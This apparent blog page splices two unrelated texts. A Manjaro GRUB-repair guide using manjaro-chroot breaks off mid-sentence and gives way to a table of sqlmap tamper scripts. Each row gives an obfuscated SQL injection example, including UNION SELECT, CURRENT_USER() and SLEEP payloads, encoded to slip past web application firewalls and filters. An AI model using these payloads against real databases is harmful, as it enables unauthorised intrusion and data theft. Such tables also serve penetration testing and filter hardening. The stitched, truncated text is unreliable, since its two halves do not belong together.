Boot to any [Manjaro] live GUI disk. Use manjaro-chroot 1. Start by identifying the partition where your Manjaro installation controlling the active Grub menu resides and needs repairing. If you are in Graphical mode you can use an application called GPartEd , which should be in Menu > System > GPartEd. This will provide a simple visual illustration of the partitions on your hard drive(s). To do the same thing from terminal or TTY you can use this command lsblk -f 2. manjaro-chroot is a tool to easily setup a functional chroot into an installed Linux installation from a live boot of a Manjaro Installation Media. To setup the chroot use the command sudo manjaro-chroot -a You will be presented with a terminal. Wait until it shows a list with the available system partitions on your computer and choose the one you want to repair. 1.) First of all check the partition for the ESP (EFI System Partition). An ESP is a fat32 partition and contains .efi ...
| Name | Description | Example |
| apostrophemask.py | Replaces the apostrophe character with its UTF-8 full width counterpart | '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' |
| apostrophenullencode.py | Replaces the apostrophe character with its illegal double Unicode counterpart | '1 AND %271%27=%271' |
| appendnullbyte.py | Appends encoded NULL byte character at the end of payload | '1 AND 1=1'; |
| base64encode.py | Base64 all characters in a given payload | 'MScgQU5EIFNMRUVQKDEwKSM=' |
| between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | '1 AND A NOT BETWEEN 0 AND B--' |
| bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator | 'SELECT%09id FROM users where id LIKE 1' |
| chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) | '%2553%2545%254C%2545%2543%2554%2520%2 546%2549%2545%254C%2544%2520%2546%2552 %254F%254D%2520%2554%2541%2542%254C%2545' |
| commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' | ''LIMIT 3 OFFSET 2'' |
| commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' | 'MID(VERSION() FROM 1 FOR 1)' |
| concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' | 'CONCAT_WS(MID(CHAR(0),0,0),1,2)' |
| charencode.py | Url-encodes all characters in a given payload (not processing already encoded) | '%53%45%4C%45%43%54%20%46%49%45%4C%4 4%20%46%52%4F%4D%20%54%41%42%4C%45' |
| charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) | '%u0053%u0045%u004C%u0045%u0043%u0054%u 0020%u0046%u0049%u0045%u004C%u0044%u002 0%u0046%u0052%u004F%u004D%u0020%u0054% u0041%u0042%u004C%u0045' |
| equaltolike.py | Replaces all occurances of operator equal ('=') with operator 'LIKE' | 'SELECT * FROM users WHERE id LIKE 1' |
| escapequotes.py | Slash escape quotes (' and ") | '1\\\\" AND SLEEP(5)#' |
| greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | '1 AND GREATEST(A,B+1)=A' |
| halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT (/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST( /*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR (32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0N ULL#/*!0AND 'QDWa'='QDWa" |
| ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' | 'IF(ISNULL(1),2,1)' |
| modsecurityversioned.py | Embraces complete query with versioned comment | '1 /*!30874AND 2>1*/--' |
| modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment | '1 /*!00000AND 2>1*/--' |
| multiplespaces.py | Adds multiple spaces around SQL keywords | '1 UNION SELECT foobar' |
| nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters | '1 UNIOUNIONN SELESELECTCT 2--' |
| percentage.py | Adds a percentage sign ('%') infront of each character | '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E' |
| overlongutf8.py | Converts all characters in a given payload (not processing already encoded) | 'SELECT%C0%AAFIELD%C0%AAFROM%C0%AAT ABLE%C0%AAWHERE%C0%AA2%C0%BE1' |
| randomcase.py | Replaces each keyword character with random case value | 'INseRt' |
| randomcomments.py | Add random comments to SQL keywords | 'I/**/N/**/SERT' |
| securesphere.py | Appends special crafted string | "1 AND 1=1 and '0having'='0having'" |
| sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | '1 AND 9227=9227-- sp_password' |
| space2comment.py | Replaces space character (' ') with comments '/**/' | 'SELECT/**/id/**/FROM/**/users' |
| space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' |
| space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227 =9227' |
| space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') | '1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23 lujYFWfv%0A9227=9227' |
| space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%0Eid%0DFROM%07users' |
| space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') | '1%23%0AAND%23%0A9227=9227' |
| space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%A0id%0BFROM%0Cusers' |
| space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') | '1--%0AAND--%0A9227=9227' |
| space2plus.py | Replaces space character (' ') with plus ('+') | 'SELECT+id+FROM+users' |
| space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters | 'SELECT%0Did%0DFROM%0Ausers' |
| symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) | "1 %26%26 '1'='1" |
| unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT | '-1 UNION SELECT' |
| unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) | '1%bf%27 AND 1=1-- ' |
| uppercase.py | Replaces each keyword character with upper case value | 'INSERT' |
| varnish.py | Append a HTTP header 'X-originating-IP' | http://h30499.www3.hp.com/t5/Fortify-Application-S ecurity/Bypassing-web-application-firewalls-using-HT TP-headers/ba-p/6418366 |
| versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment | '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL */,CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST (CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CH AR(58,100,114,117,58))# |
| versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | '1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL */,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFN ULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR* /),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#' |
| xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' | ' headers["X-Forwarded-For"]' |
Comments
Post a Comment